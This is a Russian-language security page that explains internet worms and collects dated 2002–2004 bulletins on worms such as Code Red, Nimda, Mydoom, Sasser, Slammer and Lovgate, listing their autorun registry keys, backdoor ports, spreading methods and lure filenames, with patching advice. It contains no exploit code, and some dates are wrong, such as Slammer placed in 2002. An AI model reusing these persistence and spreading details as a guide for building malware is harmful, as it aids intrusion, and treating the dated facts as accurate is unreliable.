RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

Интернет черви

     
 

Новости

20 бoлeзнeй oт кoта
Опасность вейпинга
Вpeднa ли coя жeнщинaм
Вcя пpавда o яйцаx
Вpaчи нaпoмнили o pискe зapaзиться гeпaтитoм в сaлoнaх кpaсoты
В кaкoе время сyтoк лyчше не лечиться
Tиxий чаc дважды в нeдeлю cнижаeт pиcк инфаpкта и инcульта в два pаза
Слaдкaя гaзиpoвкa вoздействyет нa opгaнизм
Почeмy витaминныe добaвки нe пpиноcят пользы
 

Интернет черви - основы основ.

Code Red, Code Red II, Klez - кто о них не слышал, а сколько от них пострадало кампаний и простых людей… Все это компьютерные черви. Цель этой статьи - объяснить, что такое интернет червь или компьютерный червь (разницы никакой) и показать способы защиты от них. Вперед!

Что такое компьютерный червь?
Компьютерный червь очень похож на компьютерный вирус, то есть это программа, которая сама себя копирует и часто, но не всегда, содержит некую функцию, которая вмешивается в нормальную работу компьютера.

Интернет червь - это саморазмножающаяся программа, которая не заражает (изменяет) файлы, а оседает в активной памяти и размножается, использую компьютерные сети.

Черви пользуются средствами операционных систем, что бы скрыть свое присутствие на компьютере от пользователя, и каждый раз загружаться без ведома юзеров. Обычно, компьютерных червей обнаруживают, когда их неконтролируемое размножение начинает потреблять много системных ресурсов, тормозя некоторые приложения или всю систему. Новый класс интернет червей, например, Worm.ExploreZip, также оседает в активной памяти и размножается через компьютерные сети, но он еще содержит некую опасную функцию.

В отличие от вирусов, черви распространяются, как отдельная программа; они не прикрепляют свое тело к другим файлам или программам. Компьютерный червь может распространяться сам (без помощи пользователя) через сеть - с одного компьютера, на следующий и т. д.

Интернет черви были так названы, потому что наносят гигантский вред и из-за того, что они распространяются самостоятельно, то есть пользователю не обязательно запускать какую-либо программу, чтобы активировать компьютерный червь.

Черви, которые ломали IIS и потрясли мир.

Code Red, Code Red II и Nimda буйствовали в сети с Июля по Октябрь 2001 года. 19 июля 2001 года, в течение девяти часов, вирус Code Red подорвал работу более 250,000 серверов. Некоторые сети просто прекратили свою работу, другие работали очень медленно. Множество маленьких интернет провайдеров вынуждены были прекратить свою работу на несколько часов или даже более того.

Вирус получил название 'Code Red', потому что он был открыт техническими служащими, которые пили новый напиток компании 'Mountain Dew', под названием Code Red.

Интернет 'червь' Code Red заражал компьютерные сервера, на которых использовалось программное обеспечение фирмы Microsoft, а точнее Microsoft's Internet Information Server (IIS), который входил в стандартную комплектацию новых версии WinNT. Около 6 миллионов веб серверов используют IIS. Когда червь заражал компьютерный сервер, он дефейсил главную страницу и помещал следующий текст: "Welcome to http://www.worm.com! Hacked by Chinese!". Также, зараженные сервера должны были послать 400 мегабайтовые пакеты информации на whitehouse.gov то есть провести DDoS атаку. Компьютеры Белого Дома спасло лишь то, что служащие вовремя сменили IP адреса серверов.

Code Red распространялся так: 1) Случайным образом выбирал 100 IP адресов 2) определял, стоит ли на этих компьютерах IIS 3) Заражал только те компьютеры, на которых присутствовал интернет сервер от Microsoft (тот самый IIS). Почему заражению подверглись компьютеры только с установленным IIS? Все очень просто - червь использовал недавно обнаруженную уязвимость в этом программном обеспечении. Похоже, что Code Red заражал только Англоязычные сервера.

За две недели до появления Code Red, Microsoft выпустила патч, закрывающий дыры, которые в последствии использует червь Code Red. Как водится, этот патч скачали не все, а точнее почти никто ;), за что и поплатились. Кстати, заплатка и сейчас доступна на сайте Microsoft (http://www.microsoft.com). Если бы все скачали этот патч, то 100%, что они не подвергли себя угрозе заражения.

Вслед за Code Red, появился и Code Red II - гораздо более деструктивный (разрушительный) вариант, который использовал те же самые уязвимости в IIS, что и Code Red, но содержал в себе еще и троян. Этот троян давал хакерам полный контроль над зараженной системой.

Затем, 11 сентября 2001 года появился червь из червей - NIMDA. Если бы этот червь производил какие-либо разрушительные действия, то ущерб, нанесенный им, был бы огромен!

"По сути, это настоящий коктейль из вируса, трояна и компьютерного червя", - сказал первый заместитель директора 'Internet Services'.

Nimda использовала уже обнаруженную дыру в Microsoft's Internet Information Server Web software (тоже самое, что Code Red и Code Red II). Когда Nimda попадает на компьютер, она первым делом пытается размножить себя тремя способами. 1) У этого червя есть свой собственный e-mail движок, то есть Nimda пытается разослать себя всем тем, кто находится в адресной книги Microsoft Outlook. 2) Червь занимается поиском IIS серверов и сканирует их на предмет существования уже найденных уязвимостей. 3) Nimda ищет расшаренные диски и пытается на них пробраться.

В конце концов, червь Nimda заразил порядка 8,3 миллиона компьютерных сетей. Причиненный ущерб оценивается в 590 миллионов долларов.

Как защититься от компьютерных червей?


2004


15.11.2004
I-Worm.Mydoom.r

Вирус-червь, распространяющийся через интернет в виде файлов, прикрепленных к зараженным письмам, а также по сетям файлообмена Kazaa. Рассылается по всем найденным на зараженном компьютере адресам электронной почты.
Червь является приложением Windows (PE EXE-файл), имеет размер около 38КБ, упакован UPX. Размер распакованного файла около 74КБ.
Червь содержит в себе бэкдор-функцию.
Инсталляция
После своего запуска червь запускает Windows Notepad, в котором демонстрирует произвольный набор символов:

При инсталляции червь копирует себя с именем "tasker.exe" в системный каталог Windows и регистрирует этот файл в ключе автозагрузки системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
 "Task"="%System%\tasker.exe"

Червь создает в системном каталоге Windows файл "nemog.dll", являющийся бэкдор-компонентом и регистрирует этот файл в системном реестре:

[HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32]
 "(Default)"="%System%\Nemog.dll"
Распространение через email

Для поиска адресов жертв червь сканирует адресные книги MS Windows, а также ищет адреса в файлах, имеющих следующие расширения:

adbh
aspd
dbxn
htmb
phpq
pl
shtl
tbbg
wab

При этом игнорируются адреса, содержащие следующие подстроки:

.edu
.gov
.mil
abuse
accoun
acketst
admin
anyone
arin.
avp
berkeley
borlan
bsd
bugs
ca
certific
contact
example
feste
fido
foo.
fsf.
gnu
gold-certs
google
gov.
help
iana
ibm.com
icrosof
icrosoft
ietf
info
inpris
isc.o
isi.e
kernel
linux
listserv
math
me
mit.e
mozilla
mydomai
no
nobody
nodomai
noone
not
nothing
ntivi
page
panda
pgp
postmaster
privacy
rating
rfc-ed
ripe.
root
ruslis
samples
secur
sendmail
service
site
soft
somebody
someone
sopho
submit
support
syma
tanford.e
the.bat
unix
usenet
utgers.ed
webmaster
you
your

При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам.
Характеристики зараженных писем
Отправитель:
Имя отправителя выбирается из следующих вариантов:

adam
alex
alice
andrew
anna
bill
bob
brenda
brent
brian
claudia
dan
dave
david
debby
fred
george
helen
jack
james
jane
jerry
jim
jimmy
joe
john
jose
julie
kevin
leo
linda
maria
mary
matt
michael
mike
peter
ray
robert
sam
sandra
serg
smith
stan
steve
ted
tom
Тема письма:

Выбирается из списка:

Error
hello
hi
Mail Delivery System
Mail Transaction Failed
Server Report
Status
test
Текст письма:

Используется один из предустановленных вариантов, например:

Имя файла-вложения:

Выбирается из списка:

body
data
doc
document
file
message
readme
test
text

Вложения могут иметь одно из следующих расширений:

bat
cmd
doc
exe
htm
pif
scr
tmp
Размножение через P2P

Червь проверяет наличие установленного на машине клиента Kazaa и копирует себя в каталог файлообмена под следующими именами:

Cleaner.exe
Crack.exe
Fixtool.exe
Hotmail hacker.exe
Mydoom.exe
Netsky.exe
ps2 emulator.exe
SoBig.exe
Upload.exe
Vahos.exe
Viraus.exe
Wenrar.exe
Winzip.exe
xbox emulator.exe
XXX Pictures.exe
XXX Videos.exe
yahoo hacker.exe
Удаленное администрирование

Червь открывает на зараженной машине TCP порт 5422 для приема команд. Функционал бэкдора позволяет злоумышленнику получить полный доступ к системе. Бэкдор может загружать из интернета и запускать на исполнение любые файлы.
Прочее
I-Worm.Mydoom.r содержит следующие строки:

MSG To SkyNet-Netsky: i know skynet is sucks so fuck off and i will
complete my projects ok baby!,the second author for mydoom worms!!, he
will complete the project, more is coming soon better than better,
Kuwait


Q: Как работает нашумевший ICQ-червь Worm.Win32.Bizex?
A: Он распространялся по icq, рассылая сообщение, уводящее на сайт со звуковой ICQ-схемой. Схема .scm, без спроса загрузившись в систему (из-за ошибки в пейджере), подменяет ряд звуковых файлов. Затем, через дырку в системе Help’a IE, запускает с системными правами код эксплойта. Зараза winupdate.exe загружается в автозагрузку и начинает рассылать рекламу сайта по аське. Более подробное описание есть на www.viruslist.com, securityresponse.symantec.com и www.trendmicro.com. Червь заставил почесаться любителей старых версий icq :).


Worm.Win32.Sasser.a/b
Опасность : средняя
Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows.
Ее описание приведено в Microsoft Security Bulletin MS04-011.
Червь написан на языке C/C++, с использованием компилятора Visual C.
Имеет размер ок. 15 Кб, упакован ZiPack.
Размножение:
При запуске червь регистрирует себя в ключе автозапуска системного реестра:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
avserve.exe = %WINDIR%\avserve.exe

Червь сканирует IP-адреса в поисках компьютеров, подверженных уязвимости MS04-011. Уязвимый компьютер на TCP-порту 9996 запускает командную оболочку "cmd.exe" и принимает команду на загрузку и запуск копии червя.
Загрузка выполняется по протоколу FTP.
Для этого червь запускает FTP-сервер на TCP-порту 5554 и по запросу с уязвимого компьютера загружает туда свою копию. Загруженная копия имеет имя "_up.exe", где N - случайное число.


14 апреля 2004 года              Bugbear.C


В настоящее время в интернете вовсю свирепствует одна из модификаций этого вируса - Bugbear.C. Он рассылает себя по всем адресам, найденным им в адресной книге Outlook на зараженном компьютере, а также в файлах со следующими расширениями: ODS, MMF, NCH, MBX, EML, TBB и DBX. Тема сообщения, содержащего червя, включает в себя текст, пытающийся привлечь внимание получателя: "Payment notices", "Just a reminder", "Announcement", "Please Help...", "Report click on this!", "SCAM alert!!!", "Warning!", "Your Gift" , "Good news!", и т.д. Данное сообщение также содержит вложенный файл с расширением ZIP или HTM.
Bugbear.C устанавливает программу-перехватчика на поражаемом компьютере, которая похищает информацию и высылает ее автору вируса. Кроме того, он завершает процессы защитных программ, включая антивирусные решения для домашних пользователей и корпоративных сетей, и не позволяет запускать их, оставляя компьютер уязвимым перед атаками других вредоносных объектов.

24.02.04  ICQ-червь
Очередная зараза, использующая при распространении известную уже два года дырку в ICQ, позволяющую под видом звуковой схемы закачать на атакуемую машину произвольный файл. В данном случае жертве заливается chm-файл, из которого через дырку в реализации штатной IE-шной функции showHelp уже с локального диска запускается скрипт, выполняющий основную черную работу. Пользователи альтернативных клиентов, как обычно, могут спать спокойно.
P.S. Hе ходите по ссылкам.


20.02.2004     NetSky и NetSky.B


Сотрудники сразу нескольких компаний, специализирующихся на вопросах компьютерной безопасности,сообщили об обнаружении двух вредоносных программ, распространяющихся по электронной почте. Оригинальная версия червя, получившего название NetSky (также известен как Moodown), появилась в понедельник. А спустя два дня, в среду, началась эпидемия вируса NetSky.B.


По данным Network Associates, серверы компании регистрируют до 40-50 копий NetSky.B в час. А фирма Symantec уже зафиксировала около тысячи случаев заражения. Вредоносная программа, как уже упоминалось, распространяется по электронной почте в виде файлов-вложений. При этом тема письма, текст и название файла выбираются произвольно из указанного в коде червя списка. При первом запуске вирус отображает на экране сообщение об ошибке: "Error. The file could not be opened!". После этого NetSky.B записывает свою копию в папку Windows под именем services.exe. Далее вредоносная программа регистрируется в системном реестре операционной системы, обеспечивая, тем самым, автоматическую загрузку при каждом включении ПК. Для дальнейшего размножения червь сканирует файлы с расширениями .msg, .oft, .sht, .dbx, .tbb, .adb, .doc, .wab, .asp, .uin, .rtf, .vbs, .html, .htm, .pl, .php, .txt, .eml в поисках адресов электронной почты. Отправка инфицированных посланий осуществляется с использованием встроенного SMTP-сервера.


Вредоносная программа NetSky представляет угрозу для пользователей операционных систем Win2K\9X\XP. Компьютеры, работающие под управлением Linux, Macintosh, UNIX и Windows 3.x, заражению не подвержены.



28.01.2004          Hовая версия червя Mimail


Вредоносная программа Mimail.Q отличается от предшественников, прежде всего, встроенной криптографической защитой от антивирусов. Механизм работы данной системы заключается в следующем: при перезагрузке инфицированного компьютера червь меняет ключ шифрования таким образом, что рассылаемые копии вируса каждый раз выглядят по-разному. Это, в свою очередь, требует от антивируса поддержки функции дешифрации файлов.


Новая версия Mimail распространяется по электронной почте в письмах с вложениями. Возможны несколько десятков вариантов названий как самих сообщений, так и вложенных файлов. Червь состоит из двух компонентов - модуля установки основной части и носителя. После неосторожного запуска вложения модуль установки вредоносной программы копирует себя в каталог Windows под именем sys32.exe и регистрируется в ключе автозапуска системного реестра. Далее запускается основная часть червя с именем outlook.exe, выполняющая сразу несколько функций. Во-первых, вирус рассылает свои копии по найденным на компьютере адресам электронной почты. Во-вторых, программа открывает черный вход в систему через порты 6667, 3000, 80, 1433 и 1434. Наконец, в-третьих, Mimail.Q пытается найти на ПК конфиденциальные данные о счетах платежных систем PayPal и E-Gold и отправить эту информацию на анонимные почтовые ящики на публичных серверах.


21.01.2004 Новый почтовый червь Bagle-A
Антивирусная компания Sophos предупреждает о появлении нового сетевого червя, получившего название Bagle-A(Beagle). Червь распространяется по электронной почте в письмах с вложением в виде исполняемого файла.


Первые сообщения о Bagle-A пришли из Австралии, затем поступила информация из Великобритании и других стран. Заражённые письма содержат файл с расширением *.exe и случайно сгенерированным именем, размер файла - 15872 байт. В теле письма содержатся слово test и беспорядочный набор символов. Исполняемый файл может маскироваться под Windows-приложение "Калькулятор", но его основная задача - пробить брешь в системе безопасности ОС, которой потом могут воспользоваться злоумышленники.


Активизировавшись, червь сканирует на компьютере файлы с расширениями *.wab, *.txt, *.htm и *.html в поисках адресов e-mail. Затем происходит рассылка писем по этим адресам. Попутно червь устанавливает программный компонент, прослушивающий TCP-порт 6777. Таким образом, хакер может получить управление над заражённым компьютером. В списке задач Windows червя можно узнать по имени bbeagle.


Червь Bagle-A опасен лишь для неопытных пользователей ПК, к тому же, после 28 января 2004 г. он прекратит какую-либо деятельность.


2003


15.01.2003                          Червь Avron
"Лаборатория Касперского" объявила о появлении в Сети опасного червя под названием Avron. Червь распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Также копирует себя на все логические диски (включая сетевые). Содержит троянскую процедуру, ворующую пароли.
При инсталляции червь копирует себя в системный каталог Windows со случайным именем (например, dadd52doc.exе или ef23h672.exe) и регистрирует этот файл в ключе авто-запуска системного реестра (HKLM\Software\Microsoft\Windows\CurrentVersion\Run, ключ Mortimer = %имя файла червя%). При рассылке зараженных писем червь использует прямое подключение к SMTP-серверу. Адреса, по которым происходит рассылка, червь считывает из адресной книги Windows (WAB), а также ищет адреса в файлах с расширениями DBX, MBX. WAB, HTML, EML, HTM, ASP. SHTML.
Червь в своих письмах также случайно использует брешь в системе защиты IFrame. При рассылке червь создает временный файл NewBoot.sys во временном каталоге Windows. Там же создается файл listrecp.dll, в который записываются все обнаруженные адреса электронной почты.

Заражение сети. Червь копирует себя со случайными именами в каталог RECYCLED на всех доступных дисках. Если такого каталога нет, червь копирует себя в корневой каталог диска. Для автозапуска своей копии червь дописывает команду в файл autoexec.bat на том же диске.

Размножение червя с использованием ICQ и IRC. Варианты червя "b" и "c" ищут библиотеку ICQMapi.dll и пытаются послать свои копии по номерам ICQ, содержащимся в списке контактов ICQ. Они также создают файл script.ini в директории mIRC, так, что их копии рассылаются в каналы IRC, с которыми соединяется пользователь зараженного компьютера.

Размножение через Kazaa. Варианты Avron.b и Avron.c создают свои копии в общедоступной директории Kazaa со случайными именами.

Троянская процедура. Червь считывает кешированные пароли и отправляет их на адрес [email protected] в письме с заголовком "Password Got".

Также по 7-м и 24-м числам каждого месяца червь запускает процедуру, которая случайно перемещает курсор мыши и открывает Web-страницу. Кроме этого, Avron постоянно следит за антивирусными программами и принудительно завершает их работу.
Червь Avron в "Вирусной энциклопедии Касперского"

Новый червяк активно использует переполнение буфера в MS SQL 2000, обнаруженное еще летом прошлого года. Соответственно, для рядовых пользователей особой опасности он не представляет, не считая побочного эффекта - в процессе сканирования сети на предмет поиска новых жертв червяк создает весьма неслабый трафик, что вполне может сработать как DoS-атака. Целесообразно закрыть на файрволлах 1434-й порт (это полезно в любом случае, не дело пускать всех подряд к sql-серверу), а многострадальным владельцам MS SQL наконец-то скачать полугодовой давности патч.



Червь Slammer: как он устроен, и как с ним бороться
Как уже сообщала "Компьюлента", 25 января 2002 года интернет был частично парализован из-за нового вируса Slammer (также известного под именем Helkern).


По информации "Лаборатории Касперского", интернет-червь Slammer, заражающий серверы под управлением системы баз данных Microsoft SQL Server 2000, имеет небольшой размер (376 байт) и работает по уникальной технологии, благодаря которой обеспечивается высочайшая скорость его распространения. Он принадлежит к классу так называемых "бестелесных" червей, которые действуют исключительно в оперативной памяти компьютера, что существенно осложняет их обнаружение и нейтрализацию традиционными антивирусными программами-сканерами. Первым представителем этого класса вирусов был червь CodeRed, обнаруженный летом 2001 года и вызвавший сбои в работе интернета, в том числе и в российской его части. Впрочем, даже на пике своей активности, Code Red был куда менее опасен.


Новый червь заражает компьютеры под управлением СУБД Microsoft SQL Server 2000, которая сравнительно часто используется на веб-серверах. Для домашних пользователей, не работающих с SQL Server, червь опасности не представляет. Slammer проникает на компьютеры через брешь класса "переполнение буфера" (Buffer Overrun), для чего на атакуемый компьютер посылается нестандартный запрос, при обработке которого система автоматически выполняет и содержащийся в запросе вредоносный код червя.


После заражения сервера Slammer запускает бесконечный цикл распространения (командой "sendto") на случайно выбранные адреса в сети в порт UDP 1434 (при этом используются случайные данные от команды "GetTickCount") и, таким образом, многократно увеличивает сетевой трафик. По утверждению специалистов "Лаборатории Касперского", помимо создания большого объема избыточного сетевого трафика, Helkern не имеет других побочных действий, в том числе, деструктивных.


Чтобы избавиться от Slammer, нужно перезагрузить заражённый компьютер. Так как червь находится только в памяти компьютера, после перезагрузки он исчезнет. Однако если патч не установлен, вероятность повторного заражения сохраняется.


Уязвимость, которой пользуется Slammer для проникновения на серверы под управлением SQL Server 2000, была обнаружена и официально признана компанией Microsoft еще 24 июля 2002 года. Тогда же на официальном сайте Microsoft был выложен патч, устраняющий эту уязвимость. Кроме того, если это возможно, следует также заблокировать входящий траффик 1434 UDP порта (SQL Server Resolution Service Port). Это можно сделать с помощью файрволла или маршрутизатора.


  • Описание вируса на сайте "Лаборатории Касперского"

  • Рекомендации по борьбе с вирусом на сайте Panda Software

  • CERT Advisory CA-2003-04 MS-SQL Server Worm (на английском языке)

  • Заявление Microsoft по поводу вируса (на английском языке)

  • Описание вируса на сайте Symantec (на английском языке)

  • Microsoft Security Bulletin MS02-039: Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution

  • Патч, позволяющий устранить ошибку в MS SQL Server


21.02.2003                                                             Tang - новый вирус
Компания Panda Software сообщает о появлении нового червя W32/Tang, который способен распространяться с помощью электронной почты, mIRC, Pirch и vIRC, а также посредством наиболее популярных программ обмена файлами - KaZaA, BearShare, Edonkey и Morpheus.
Основные действия, выполняемые червем W32/Tang:
- червь ищет в общих папках таких программ, как Kazaa или Morpheus файлы со следующими расширениями: scr, pif, mp3, mp2, gif, bmp, dib, png, jpg, jpeg, jpe, tif, tiff, mpg, mpeg, mpe, avi, mov, tmp, txt, lnk, bat, mdb, ppt и pps. При обнаружении указанных файлов он заменяет их своей копией;
- червь заражает документы Excel, общие шаблоны Word и файлы Access;
- он проверяет, не установлены ли на пораженном компьютере приложения IRC mIRC, Pirch и vIRC. При обнаружении таковых червь изменяет файлы script.ini и events.ini для получения возможности отправки файла Notice.tng с использованием команды /DCC;
- при активации Tang выводит на экран ложные сообщения об ошибках;
- для обеспечения автоматического запуска вредоносного кода при каждом включении компьютера червь создает специальный ключ в системном реестре Windows.
W32/Tang – это самый последний вредоносный код, использующий для распространения наиболее популярные приложения обмена файлами. Первый, Kazoa, первоначально появился в мае 2002 года. Вслед за ним появились такие вирусы, как Enerkaz, Oror, Lolol и Lirvaand, а также его версия "C", появившаяся всего несколько дней назад.



25.02.2003           Новый червь Lovegate


Антивирусные компании сообщают о появлении нового вируса - Lovegate. Он распространяется с помощью электронной почты и через сетевые папки. Свои копии вирус помещает в исполняемых файлах с именами docs.exe, pics.exe, fun.exe, setup.exe, joke.exe и некоторыми другими.


Для распространения по электронной почте червь использует следующий трюк: свои копии он направляет в виде ответов на входящие письма. По замыслу автора вируса, получатель с большей вероятностью запустит вложенный файл, если тот будет прилагаться к ответу на его письмо.


Кроме этого, Lovegate сканирует все HTML-файлы, имеющиеся в папках Windows, My Documents и текущей папке, извлекая из них адреса электронной почты. По всем найденным адресам вирус рассылает свои копии. Вложенный файл маскируется под архив с документами, shareware-программы, утилиты для взлома или ROM-файлы для эмуляторов игровых приставок и т.д. 


После активации вирус открывает для своих авторов черный ход в систему через порт 10168. Извещение об успешном заражении направляется на один из почтовых адресов [email protected] или [email protected], которые принадлежат китайским провайдерам.


По информации Trend Micro наибольшее распространение вирус получил на Тайване, в Японии, Австралии, во Франции и других странах. В США масштабы распространения Lovegate заметно меньше. В целом, опасность червя оценивается как средняя, но пользователям стоит быть начеку



03/03/2003                         "Randon": берегите ваш 445 порт!
Обнаружена смесь червя и троянской программы. "Лаборатория Касперского", сообщает о регистрации случаев заражения новым сетевым червем "Randon".
"Randon" распространяется по IRC-каналам и ресурсам локальных сетей, и заражает компьютеры под управлением операционных систем Win2K и Win XP. Для проникновения на компьютер он подключается к IRC-серверу (или локальной сети), сканирует находящихся на нем пользователей, устанавливает с ними соединение по порту 445 и пытается подобрать пароль из встроенного списка наиболее часто используемых фраз. В случае успешного взлома системы "Randon" пересылает на нее троянскую программу "Apher", которая, в свою очередь, загружает с удаленного Web-сайта остальные компоненты червя (всего 13 файлов, в том числе полноценный mIRC-клиент - программа для работы с IRC-каналами).
После этого "Randon" устанавливает свои компоненты в системном каталоге Windows, регистрирует свой основной файл и mIRC-клиента в ключе автозапуска системного реестре Windows и запускает их на выполнение. Для сокрытия присутствия в памяти стороннего mIRC-клиента "Randon" использует специальную утилиту "HideWindows", которая также является одной из компонент червя. Благодаря ей он оказывается невидимым для пользователя, так что активный процесс "Randon" можно обнаружить только в диспетчере задач Windows.
К счастью "Randon" не содержит каких-либо деструктивных функций. Его побочные эффекты - создание на зараженной машине большого объема избыточного трафика и переполнение IRC-каналов.


12 марта 2003 года                  Привет из Китая


Появились первые сообщения об обнаружении червя Deloder (W32/Deloder.A). Эта программ создана в Китае и приживается на машинах, работающих под управлением операционных систем Win2: и XP. Для распространения данный вредоносный код ищет в сети Интернет компьютеры, с которыми он может соединиться через порт 445. При успешной установке соединения червь копирует в папку Windows файл INST.EXE. Этот файл является троянцем, предназначенным для получения удаленного доступа к компьютеру. После этого Deloder создает свою копию на зараженном компьютере в файле DVLDR32.EXE.  Кроме того, Deloder пытается обнаружить имена пользователей, подключенных к той же сети, что и зараженный компьютер. Найдя их, червь пытается получить доступ к компьютерам путем подбора пароля к системе из списка наиболее часто используемых слов и выражений.  Наконец, Deloder отключает общие сетевые ресурсы и вносит некоторые записи в системный реестр Windows для обеспечения постоянной работы на зараженном компьютере



17 марта 2003 года Нас посетил Code Red F, который является модификацией уже старого вируса Code Red. 
Впервые мы познакомились с этим червем летом 2001 года. Тогда это было настоящее событие - за 9 часов было заражено четверть миллиона рабочих станций и нанес ущерб общим размером более миллиарда долларов. Тогда это вирус использовал дыру в системе безопасности Microsoft Internet Information Server (IIS), которая позволяет злоумышленникам запускать на удаленных серверах посторонний программный код.
Опасность Code Red F заключается в том, что он открывает на полный доступ диски C: и D:. Затем информация о черве заносится в память машины и создается файл Trojan.VirtualRoot, с помощью которого можно получить полный доступ к машине.



25/03/2003    В мире компьютерных вирусов прошедшая неделя ознаменовалась появлением вирусов Axatak, Ganda.A, Bibrog.C и Lentin.Q.
 Axatak распространяется посредством электронной почты и может содержаться в файлах из сети Интернет. После заражения компьютера червь перехватывает пароли для доступа к определенным ресурсам и отправляет их своему создателю.Это позволяет злоумышленникам проникать в зараженную систему, получать любую информацию, а также выполнять некоторые действия на зараженном компьютере, например, отправлять файлы или открывать/закрывать лоток устройства для чтения компакт-дисков.Наконец, каждые пять минут Axatak пытается сохранить свою копию на дискету.
Ganda.A автоматически активируется при просмотре зараженного сообщения в окне быстрого просмотра Outlook, используя брешь в IE версий 5.01 и 5.5. После заражения компьютера червь рассылает себя по всем адресам из адресной книги Win, файлов .EML, .HTM и .DBX, а также кэша Интернет. 
Ganda.A является червем, заражающим файлы PE.
Bibrog.C похищает регистрационную информацию, используемую пользователем в Hotmail, Yahoo, Citibank и т.п. Также он запрограммирован на удаление определенных фалов, но в связи с допущенной программистом ошибкой, последняя функция неработоспособна.
Lentin.Q, распространяющийся в основном по электронной почте в сообщении с постоянно изменяющимися параметрами. Lentin.Q, как и Ganda.A, пользуется брешью в версиях 5.01 и 5.5 IE, то есть компьютер может быть заражен при просмотре инфицированного сообщения в окне быстрого просмотра.
Также червь способен распространяться через локальные сети, каждую среду копируя себя на общие диски зараженного компьютера, изменяет домашнюю страницу в IE и закрывает Планировщик Windows.



05 апреля 2003 года
  
"Лаборатория Касперского" опубликовала свой вариант вирусного мартовского хит-парада. С результатом 37.6% лидирует I-Worm.Klez. Этот вирус занимается тем, что 13-го числа каждого чётного месяца ищет на всех дисках заражённого компьютера все файлы и заполняет их случайным содержимым. Такие файлы не подлежат восстановлению и должны быть заменены с резервных копий.

На втором месте обосновался I-Worm.Sobig, его выбрали 10.75% пользователей. I-Worm.Sobig известен своим пристрастием к созданию видеоэффектов на Рабочем столе. Третью ступень пьедестала почета занял I-Worm.Lentin, который уступил серебрянному призеру немногим больше одного процента. Он очень не любит антивирусные программы и пытается принудительно завершить их работу.

По 7-м и 24-м числам червь запускает процедуру, которая случайно перемещает курсор мыши и открывает веб-страницу .
Win95.CIH (Чернобыль), который заражает только машины с системами Win95/98 оказался на 10месте, видимо народ потихоньку мигрирует на систему WinXP с которой у этой программы отношения не сложились.



07 апреля 2003 года     В сети обнаружены версии 'F' и 'G' вируса Lovgate. Эти программы представляют из себя червей, распространяющихся по электронной почте и локальным сетям. Для распространения по локальным сетям эти черви создают огромное количество своих копий в тех общих папках, доступ к которым им удалось получить.

Кроме того, черви отправляют большое количество электронных сообщений, содержащих зараженные файлы, всем адресатам, письма от которых находятся в папке Inbox зараженного компьютера, а также по всем иным адресам, найденным на зараженном компьютере.

Lovgate.F и Lovgate.G написаны на языке visual C++ и упакованы с помощью ASpack. Различие между версиями 'G' и 'F' заключается в имени флага, создаваемого ими для индикации своего присутвия в памяти компьютера.


23/04/2003 По сети гуляет червяк по имени VBS/Lisa. Распространяется он по каналам IRC, а также прыгает с машины на машину через общие сетевые диски. Разумеется, что классический способ доставки посредством электронной почты, этот червь тоже небезуспешно использует. Правда, если вы не в ладах с английским, то особенно бояться вам нечего, поскольку письмо с темой "Click YES and vote against war!" вы удалите практически наверняка. А вот если у вас все же возникнет подсознательное желание сказать "Да", то соберите в кулак всю свою волю и просто промолчите. Кстати, согласно народной мудрости именно так и следует казаться умным человеком.

Ну а если любопытство окажется сильней рассудка, то червь создаст более 5000 папок в корневом каталоге жесткого диска и копии текстового файла, содержащего строку "I will never stop loving you" в каждой папке. 

Также VBS/Lisa записывает несколько команд в файл Autoexec.bat для форматирования диска C:\ и перезагружает компьютер. Также этот червь уничтожает файл Regedit.exe и, если после заражения прошло от трех дней и более, VBS/Lisa удаляет следующие файлы: user.dat, user.bak, system.dat, system.bak и win.com. Наконец, VBS/Lisa отключает все ярлыки, находящиеся на рабочем столе, и, для усложнения работы антивирусной программы, вставляет специальные символы в их коды. 


29.04.2003   Компания Symantec предупреждает о появлении нового червя. способного шпионить за пользователями компьютеров. Червь, названный W32.HLLW.Kullan, копирует себя в системную папку Windows и, будучи активированным, заражает все компьютеры, доступные в сетевом окружении. Червь содержит целый ряд backdoor-функций: умеет проверять почту, записывать информацию, вводимую с клавиатуры и собирать информацию о конфигурации компьютера и операционной системе.


07 мая 2003 года                                     Сам себе сервер
В сети обнаружена активность червя Nolor (WW2/Nolor). Nolor - это червь, распространяющийся по электронной почте. После заражения компьютера он рассылает свои копии с помощью собственного SMTP механизма по всем адресам, хранящимся в адресной книге компьютера. Сообщение, содержащее Nolor, очень сильно меняется, но всегда оно связано с фотографиями Бин Ладена, поздравительными открытками или паролями для каких-либо программ. Тем не менее, Nolor достаточно легко опознать, так как сообщение всегда содержит одиниз следующих вложенных файлов: LOVE_LORN.KIS.OK.EXE, LOVELORN.KIS.OK.EXE,
THUYQUYEN.KIS.OK.EXE, LOVE_LORN.HTM, LOVELORN.HTM или THUYQUYEN.HTM.


11.05.2003                                                          Апрельская двадцатка
"Лаборатория Касперского" опубликовала список наиболее активных вредоносных программ за апрель текущего года. Первое место досталось червю Klez - на его долю пришлось более 20% всех случаев заражения, на втором месте - Lentin с 18%, третью позицию занимает червь Ganda - его "счет" составляет всего лишь 0,76%.В целом же, список активных вирусов и червей выглядит так:
1. I-Worm.Klez - 20,11%
2. I-Worm.Lentin - 17,91%
3. I-Worm.Ganda - 0,76%
4. Trojan.PSW.M2 - 0,69%
5. Win95.CIH - 0,67%
6. Macro.Word97.Thus - 0,56%
7. Troyan.PSW.MiniLD - 0,56%
8. PS-MPS-based - 0,52%
9. Backdoor.IRC.Zcrew - 0,47%
10. Macro.Word97.VMPC-based - 0,47%
11. Mnemonix.Oracle - 0,47%
12. I-Worm.LovGate - 0,44%
13. BW-based - 0,43%
14. Win95.Spaces - 0,41%
15. Win32.HLLP.Hantaner - 0,40%
16. I-Worm.Tanatos - 0,39%
17. BackDoor.SubSeven - 0,38%
18. Backdoor.SdBot.gen - 0,37%
